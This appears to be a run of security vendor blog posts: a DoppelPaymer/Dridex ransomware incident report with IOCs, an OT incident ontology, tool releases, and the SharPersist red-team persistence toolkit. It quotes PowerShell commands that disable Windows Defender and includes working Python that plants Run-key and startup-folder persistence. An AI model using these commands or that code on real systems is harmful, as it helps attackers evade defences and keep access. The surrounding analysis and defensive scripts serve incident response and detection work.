Within these investigations, FireEye identified the deployment of BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and a requirement for specific command-line arguments at execution. DoppelPaymer also uses a different encryption and padding scheme.

The ransomware and additional reconnaissance tools were downloaded through public file sharing websites such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the Sysinternals utility PsExec to distribute and execute the ransomware.

Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was used to enable the distribution of DoppelPaymer ransomware. Prior to deploying DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed the PowerShell commands used to achieve this step (Figure 15):

Event Log | EID | Message
Microsoft-Windows-PowerShell%4Operational | 600 | HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
Microsoft-Windows-PowerShell%4Operational | 600 | HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender
Application | 1034 | Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring
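One way to sweep a suspect host for this kind of tampering is to query the PowerShell Operational channel listed in Figure 15 for EID 600 entries and flag the commands shown above. The sketch below assumes it runs on the Windows host being examined and uses the built-in wevtutil utility.

import subprocess

# Query recent PowerShell EID 600 entries from the channel listed in Figure 15
proc = subprocess.run(
    ["wevtutil", "qe", "Microsoft-Windows-PowerShell/Operational",
     "/q:*[System[(EventID=600)]]", "/f:text", "/c:500", "/rd:true"],
    capture_output=True, text=True)

# Flag lines consistent with the tampering shown in Figure 15
suspicious = ("Set-MpPreference", "Uninstall-WindowsFeature -Name Windows-Defender")
for line in proc.stdout.splitlines():
    if any(marker in line for marker in suspicious):
        print(f"[!] {line.strip()}")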

The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


Figure 16: DoppelPaymer ransomware note observed during a Mandiant Incident Response investigation
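The file-level indicators described above also lend themselves to a quick sweep of a suspect volume. A minimal sketch is shown below; the extension and ransom note name are taken from the behavior described above, and everything else is illustrative.

import os

ENCRYPTED_EXT = ".locked"
RANSOM_NOTE = "readme2unlock.txt"

def sweep(root="C:\\"):
    """Walk a volume and report DoppelPaymer-style encryption artifacts."""
    encrypted, notes = 0, []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(ENCRYPTED_EXT):
                encrypted += 1
            elif name.lower() == RANSOM_NOTE:
                notes.append(os.path.join(dirpath, name))
    print(f"[+] {encrypted} '{ENCRYPTED_EXT}' files, {len(notes)} ransom notes found")
    return notes

if __name__ == "__main__":
    sweep()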

Ransomware? Not In My House!

Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in-depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

Indicators

The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

Type: FakeUpdates Files
  • 0e470395b2de61f6d975c92dea899b4f
  • 7503da20d1f83ec2ef2382ac13e238a8
  • 102ae3b46ddcb3d1d947d4f56c9bf88c
  • aaca5e8e163503ff5fadb764433f8abb
  • 2c444002be9847e38ec0da861f3a702b
  • 62eaef72d9492a8c8d6112f250c7c4f2
  • 175dcf0bd1674478fb7d82887a373174
  • 10eefc485a42fac3b928f960a98dc451
  • a2ac7b9c0a049ceecc1f17022f16fdc6

Type: FakeUpdates Domains & IP Addresses
  • <8-Characters>.green.mattingsolutions[.]co
  • <8-Characters>.www2.haciendarealhoa[.]com
  • <8-Characters>.user3.altcoinfan[.]com
  • 93.95.100[.]178
  • 130.0.233[.]178
  • 185.243.115[.]84
  • gnf6.ruscacademy[.]in
  • backup.awarfaregaming[.]com
  • click.clickanalytics208[.]com
  • track.amishbrand[.]com
  • track.positiverefreshment[.]org
  • link.easycounter210[.]com

Type: nircmdc.exe
  • 8136d84d47cb62b4a4fe1f48eb64166e

Type: Dridex
  • 7239da273d3a3bfd8d169119670bb745
  • 72fe19810a9089cd1ec3ac5ddda22d3f
  • 07b0ce2dd0370392eedb0fc161c99dc7
  • c8bb08283e55aed151417a9ad1bc7ad9
  • 6e05e84c7a993880409d7a0324c10e74
  • 63d4834f453ffd63336f0851a9d4c632
  • 0ef5c94779cd7861b5e872cd5e922311

Type: Empire C2
  • 185.122.59[.]78
  • 109.94.110[.]136

Detecting the Techniques

FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform: Endpoint Security
  • HX Exploit Detection
  • Empire RAT (BACKDOOR)
  • EVENTVWR PARENT PROCESS (METHODOLOGY)
  • Dridex (BACKDOOR)
  • Dridex A (BACKDOOR)
  • POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
  • SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
  • FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

Platform: Network Security
  • Backdoor.FAKEUPDATES
  • Trojan.Downloader.FakeUpdate
  • Exploit.Kit.FakeUpdate
  • Trojan.SSLCert.SocGholish

MITRE ATT&CK Technique Mapping

  • Initial Access: Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)
  • Execution: PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)
  • Persistence: DLL Search Order Hijacking (T1038)
  • Privilege Escalation: Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)
  • Defense Evasion: Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)
  • Credential Access: Credential Dumping (T1003)
  • Discovery: Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)
  • Lateral Movement: Remote Desktop Protocol (T1076), Remote File Copy (T1105)
  • Collection: Data from Local System (T1005), Screen Capture (T1113)
  • Command And Control: Commonly Used Port (T1043), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)
  • Exfiltration: Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)
  • Impact: Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

Acknowledgements

A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

The FireEye OT-CSIO: An Ontology to Understand, Cross-Compare, and Assess Operational Technology Cyber Security Incidents

The FireEye Operational Technology Cyber Security Incident Ontology (OT-CSIO)

While the number of threats to operational technology (OT) has significantly increased since the discovery of Stuxnet – driven by factors such as the growing convergence with information technology (IT) networks and the increasing availability of OT information, technology, software, and reference materials – we have observed only a small number of real-world OT-focused attacks. The limited sample size of well-documented OT attacks and lack of analysis from a macro level perspective represents a challenge for defenders and security leaders trying to make informed security decisions and risk assessments.

To help address this problem, FireEye Intelligence developed the OT Cyber Security Incident Ontology (OT-CSIO) to aid communication with executives and provide guidance for assessing risk. We highlight that the OT-CSIO focuses on high-level analysis and is not meant to provide in-depth insights into the nuances of each incident.

Our methodology evaluates four categories, which are targeting, impact, sophistication, and affected equipment architecture based on the Purdue Model (Table 7). Unlike other methodologies, such as MITRE's ATT&CK Matrix, FireEye Intelligence's OT-CSIO evaluates only the full aggregated attack lifecycle and the ultimate impacts. It does not describe the tactics, techniques, and procedures (TTPs) implemented at each step of the incident. Table 1 describes the four categories. Detailed information about each class is provided in Appendix 1.


Table 1: Categories for FireEye Intelligence's OT-CSIO

The OT-CSIO In Action

In Table 2 we list eleven real-world incidents impacting OT systems, categorized according to our ontology. We highlight that the ontology only reflects the ultimate impact of an incident, and it does not account for every step throughout the attack lifecycle. As a note, we cite public sources where possible, but reporting on some incidents is available to FireEye Threat Intelligence customers only.

Incident | Target | Sophistication | Impact | Impacted Equipment
Maroochy Shire Sewage Spill (2000) | ICS-targeted | Medium | Disruption | Zone 3
Stuxnet (2011) | ICS-targeted | High | Destruction | Zones 1-2
Shamoon (2012) | ICS-targeted | Low | Destruction | Zone 4-5
Ukraine Power Outage (2015) | ICS-targeted | Medium | Disruption, Destruction | Zone 2
Ukraine Power Outage (2016) | ICS-targeted | High | Disruption | Zones 0-3
WannaCry Infection on HMIs (2017) | Non-targeted | Low | Disruption | Zone 2-3
TEMP.Isotope Reconnaissance Campaign (2017) | ICS-targeted | Low | Data Theft | Zones 2-4
TRITON Attack (2017) | ICS-targeted | High | Disruption (likely building destructive capability) | Zone Safety, 1-5
Cryptomining Malware on European Water Utility (2018) | Non-targeted | Low | Degradation | Zone 2/3
Financially Motivated Threat Actor Accesses HMI While Searching for POS Systems (2019) | Non-targeted | Low | Compromise | Zone 2/3
Portable Executable File Infecting Malware Impacting Windows-based OT assets (2019) | Non-targeted | Low | Degradation | Zone 2-3

Table 2: Categorized samples using the OT-CSIO

The OT-CSIO Matrix Facilitates Risk Management and Analysis

Risk management for OT cyber security is currently a big challenge given the difficulty of assessing and communicating the implications of high-impact, low-frequency events. Additionally, multiple risk assessment methodologies rely on background information to determine case scenarios. However, the quality of this type of analysis depends on the background information that is applied to develop the models or identify attack vectors. Taking this into consideration, the following matrix provides a baseline of incidents that can be used to learn about past cases and facilitate strategic analysis about future case scenarios for attacks that remain unseen, but feasible.


Table 3: The FireEye OT-CSIO Matrix

As Table 3 illustrates, we have only identified examples for a limited set of OT cyber security incident types. Additionally, some cases are very unlikely to occur. For example, medium- and high-sophistication non-targeted incidents remain unseen, even if feasible. Similarly, medium- and high-sophistication data compromises on OT may remain undetected. While this type of activity may be common, data compromises are often just a component of the attack lifecycle, rather than an end goal.

How to Use the OT-CSIO Matrix

The OT-CSIO Matrix presents multiple benefits for the assessment of OT threats from a macro level perspective given that it categorizes different types of incidents and invites further analysis on cases that have not yet been documented but may still represent a risk to organizations. We provide some examples on how to use this ontology:

  • Classify different types of attacks and develop cross-case analysis to identify differences and similarities. Knowledge about past incidents can be helpful to prevent similar scenarios and to think about threats that have not been evaluated by an organization.
  • Leverage the FireEye OT-CSIO Matrix for communication with executives by sharing a visual representation of different types of threats, their sophistication and possible impacts. This tool can make it easier to communicate risk despite the limited data available for high-impact, low-frequency events. The ontology provides an alternative to assess risk for different types of incidents based on the analysis of sophistication and impact, where increased sophistication and impact generally equates to higher risk.
  • Develop additional case scenarios to foresee threats that have not been observed yet but may become relevant in the future. Use this information as support while working on risk assessments.

Outlook

FireEye Intelligence's OT-CSIO seeks to compile complex incidents into practical diagrams that facilitate communication and analysis. Categorizing these events is useful for visualizing the full threat landscape, gaining knowledge about previously documented incidents, and considering alternative scenarios that have not yet been seen in the wild. Given that the field of OT cyber security is still developing, and the number of well-documented incidents is still low, categorization represents an opportunity to grasp tendencies and ultimately identify security gaps.

Appendix 1: OT-CSIO Class Definitions

Target

This category comprises cyber incidents that target industrial control systems (ICS) and non-targeted incidents that collaterally or coincidentally impact ICS, such as ransomware.


Table 4: Target category

Sophistication

Sophistication refers to the technical and operational sophistication of attacks. There are three levels of sophistication, which are determined by the analyst based on the following criteria.


Table 5: Sophistication category

Impact

The ontology reflects impact on the process or systems, not the resulting environmental impacts. There are five classes in this category, including data compromise, data theft, degradation, disruption, and destruction.


Table 6: Impact category

Impacted Equipment

This category is divided based on FireEye Intelligence's adaptation of the Purdue Model. For the purpose of this ontology, we add an additional zone for safety systems.


Table 7: Impacted equipment

Open Document format creates twist in maldoc landscape

By Warren Mercer and Paul Rascagneres.

Introduction

Cisco Talos recently observed attackers changing the file formats they use in an attempt to thwart common antivirus engines. This can happen across other file formats, but today, we are showing a change of approach for an actor who has deemed antivirus engines perhaps “too good” at detecting macro-based infection vectors.  We’ve noticed that the OpenDocument (ODT) file format for some Office applications can be used to bypass these detections. ODT is a ZIP archive with XML-based files used by Microsoft Office, as well as the comparable Apache OpenOffice and LibreOffice software.

There have recently been multiple malware campaigns using this file type that are able to avoid antivirus detection, due to the fact that these engines view ODT files as standard archives and don’t apply the same rules they normally would to an Office document. We also identified several sandboxes that fail to analyze ODT documents, because the file is considered an archive and the sandbox won’t open it as a Microsoft Office document. Because of this, an attacker can use ODT files to deliver malware that would normally get blocked by traditional antivirus software.
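Because an ODT file is just a ZIP container, a triage script can treat it as one and look for the components that make a document risky. The sketch below is a generic illustration, not tied to the specific samples discussed; the directory names it checks (Basic scripts and embedded objects) follow common OpenDocument packaging conventions and are hedged with "possible" for that reason.

import sys
import zipfile

def triage_odt(path):
    """List an OpenDocument container and flag macro or embedded-object content."""
    with zipfile.ZipFile(path) as archive:
        names = archive.namelist()
        mimetype = (archive.read("mimetype").decode(errors="replace")
                    if "mimetype" in names else "?")
        macros = [n for n in names if n.startswith(("Basic/", "Scripts/"))]
        embedded = [n for n in names
                    if n.startswith(("Object", "ObjectReplacements"))
                    or n.lower().endswith(".bin")]
    print(f"{path}: mimetype={mimetype}")
    if macros:
        print(f"  [!] possible embedded macros/scripts: {macros}")
    if embedded:
        print(f"  [!] possible embedded objects: {embedded}")

if __name__ == "__main__":
    triage_odt(sys.argv[1])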

We only found a few samples where this file format was used. The majority of campaigns using malicious documents still rely on the Microsoft Office file format, but these cases show that the ODT file format could be used in the future at a more successful rate. In this blog post, we’ll walk through three cases of OpenDocument usage. The first two cases target Microsoft Office users, while the third targets only OpenOffice and LibreOffice users. We do not know at this time whether these samples were used simply for testing or in a more malicious context.

Read more at Talosintelligence.com

2019 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the sixth annual Flare-On Challenge. The popularity of this event continues to grow and this year we saw a record number of players as well as finishers. We will break down the numbers later in the post, but right now let’s look at the fun stuff: the prize! Each of the 308 dedicated and amazing players that finished our marathon of reverse engineering this year will receive a medal. These hard-earned awards will be shipping soon. Incidentally, the number of finishers smashed our estimates, so we have had to order more prizes.

We would like to thank the challenge authors individually for their great puzzles and solutions.

  1. Memecat Battlestation: Nick Harbour (@nickaharbour)
  2. Overlong: Eamon Walsh
  3. FlareBear: Moritz Raabe (@m_r_tz)
  4. DnsChess: Eamon Walsh
  5. 4k demo: Christopher Gardner (@t00manybananas)
  6. Bmphide: Tyler Dean (@spresec)
  7. Wopr: Sandor Nemes (@sandornemes)
  8. Snake: Alex Rich (@AlexRRich)
  9. Reloaderd: Sebastian Vogl
  10. MugatuWare: Blaine Stancill (@MalwareMechanic)
  11. vv_max: Dhanesh Kizhakkinan (@dhanesh_k)
  12. help: Ryan Warns (@NOPAndRoll)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 5,790 players registered and 3,228 finishing at least one challenge. This year had the most finishers ever with 308 players completing all twelve challenges.

The U.S. reclaimed the top spot of total finishers with 29. Singapore strengthened its already unbelievable position as the top per-capita Flare-On finishing country, with one finisher for every 224,000 people living in Singapore. Rounding out the top five are the consistent high-finishing countries of Vietnam, Russia, and China.

 

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

Threat Roundup for September 20 to September 27

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 20 and Sep. 27. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU272019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Open Sourcing StringSifter

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke analyst fatigue, relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.

Goals

StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.
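The same pipeline can also be driven from a Python triage script. Below is a minimal sketch that assumes both strings and rank_strings are on the PATH, as in the command above; the wrapper function name is ours, not part of the tool.

import subprocess
import sys

def rank_sample(sample_path, top_n=25):
    """Run strings | rank_strings and return the top-ranked strings."""
    strings_out = subprocess.run(["strings", sample_path],
                                 capture_output=True, text=True).stdout
    ranked = subprocess.run(["rank_strings"], input=strings_out,
                            capture_output=True, text=True).stdout
    return ranked.splitlines()[:top_n]

if __name__ == "__main__":
    for s in rank_sample(sys.argv[1]):
        print(s)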

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.

Conclusion

We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.

Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization, including the loss of access to data and systems as well as operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls, can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

Ransomware is commonly deployed across an environment in two ways:

  1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
    • Manually run encryptors on targeted systems.
    • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
    • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
    • Deploy encryptors with existing software deployment tools utilized by the victim organization.
  2. Automated propagation:
    • Credential or Windows token extraction from disk or memory.
    • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
    • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

  • Endpoint segmentation
  • Hardening against common exploitation methods
  • Reducing the exposure of privileged and service accounts
  • Cleartext password protections

If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

Read the report today.

*Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

SharPersist: Windows Persistence Toolkit in C#

Background

PowerShell has been used by the offensive community for several years now but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist.

Windows Persistence

During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1.


Figure 1: FireEye Attack Lifecycle Diagram

Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lie dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, the registry, and the startup folder, and more continue to be discovered. For a more thorough list, see the MITRE ATT&CK persistence page.


Figure 2: Persistence equation

SharPersist Overview

SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden.

SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page.

SharPersist Persistence Techniques

There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3.

Technique | Description | Technique Switch Name (-t) | Admin Privileges Required? | Touches Registry? | Adds/Modifies Files on Disk?
KeePass | Backdoor KeePass configuration file | keepass | No | No | Yes
New Scheduled Task | Creates new scheduled task | schtask | No | No | Yes
New Windows Service | Creates new Windows service | service | Yes | Yes | No
Registry | Registry key/value creation/modification | reg | No | Yes | No
Scheduled Task Backdoor | Backdoors existing scheduled task with additional action | schtaskbackdoor | Yes | No | Yes
Startup Folder | Creates LNK file in user startup folder | startupfolder | No | No | Yes
Tortoise SVN | Creates Tortoise SVN hook script | tortoisesvn | No | Yes | No

Figure 3: Table of supported persistence techniques

SharPersist Examples

On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below.

Registry Persistence

The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4.

Registry Key Code (-k) | Registry Key | Registry Value | Admin Privileges Required? | Supports Env Optional Add-On (-o env)?
hklmrun | HKLM\Software\Microsoft\Windows\CurrentVersion\Run | User supplied | Yes | Yes
hklmrunonce | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | User supplied | Yes | Yes
hklmrunonceex | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | User supplied | Yes | Yes
userinit | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | Userinit | Yes | No
hkcurun | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | User supplied | No | Yes
hkcurunonce | HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | User supplied | No | Yes
logonscript | HKCU\Environment | UserInitMprLogonScript | No | No
stickynotes | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | RESTART_STICKY_NOTES | No | No

Figure 4: Supported registry keys table

In the following example, we will first validate our arguments and then add registry persistence. Performing this validation before adding the persistence is a best practice: it confirms that the arguments are correct and that other safety checks pass before the persistence technique is actually added. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key.


Figure 5: Adding registry persistence
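
For readers who want to see what this technique boils down to under the hood, the following is a minimal Python sketch of the registry write that a Run-key persistence entry like the one in Figure 5 performs. It is an illustration of the underlying technique only, not SharPersist's C# implementation, and it reuses the example value name and payload from above; run it only on a test system.

import winreg

# Illustration of the Run-key persistence technique from Figure 5:
# create a value named "Test" that launches "cmd.exe /c calc.exe" at logon.
run_key = winreg.OpenKey(
    winreg.HKEY_CURRENT_USER,
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    0,
    winreg.KEY_SET_VALUE,
)
winreg.SetValueEx(run_key, "Test", 0, winreg.REG_SZ, "cmd.exe /c calc.exe")
winreg.CloseKey(run_key)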

When the persistence is no longer needed, it can be removed using the “-m remove” argument, as shown in Figure 6. Here we remove the “Test” registry value that was created previously, and then list all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed.


Figure 6: Removing registry persistence

Startup Folder Persistence

The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, as shown in Figure 7.


Figure 7: Performing dry-run and adding startup folder persistence
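
As a rough illustration of what this technique does on disk (again, not SharPersist's implementation), the sketch below drops a Test.lnk shortcut into the current user's startup folder. It assumes the pywin32 package for the WScript.Shell COM object; the file name and payload mirror the example above.

import os
import win32com.client  # pywin32 is assumed here

# Resolve the current user's startup folder and create Test.lnk there.
startup = os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(os.path.join(startup, "Test.lnk"))
shortcut.TargetPath = r"C:\Windows\System32\cmd.exe"
shortcut.Arguments = "/c calc.exe"
shortcut.Save()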

The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder.


Figure 8: Removing startup folder persistence

Scheduled Task Backdoor Persistence

The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.


Figure 9: Listing scheduled tasks that run at logon
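
If you want to reproduce this discovery step without SharPersist, a rough Python sketch using the built-in schtasks utility is shown below. The "Schedule Type" and "TaskName" field names come from schtasks verbose CSV output and can vary by Windows version and locale, so treat this as a starting point rather than a reliable parser.

import csv
import io
import subprocess

# Enumerate scheduled tasks and keep those whose schedule type mentions a logon trigger.
output = subprocess.run(
    ["schtasks", "/query", "/v", "/fo", "CSV"],
    capture_output=True, text=True, check=True,
).stdout

for row in csv.DictReader(io.StringIO(output)):
    if "logon" in row.get("Schedule Type", "").lower():
        print(row.get("TaskName"))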

Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10.


Figure 10: Performing dry run and adding scheduled task backdoor persistence

As you can see in Figure 11, the scheduled task is now backdoored with our malicious action.


Figure 11: Listing backdoored scheduled task

A backdoored scheduled task action used for persistence can be removed as shown in Figure 12.


Figure 12: Removing backdoored scheduled task action

Conclusion

Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike.

This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell.

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab at answering some of those questions by exploring malware debug information.

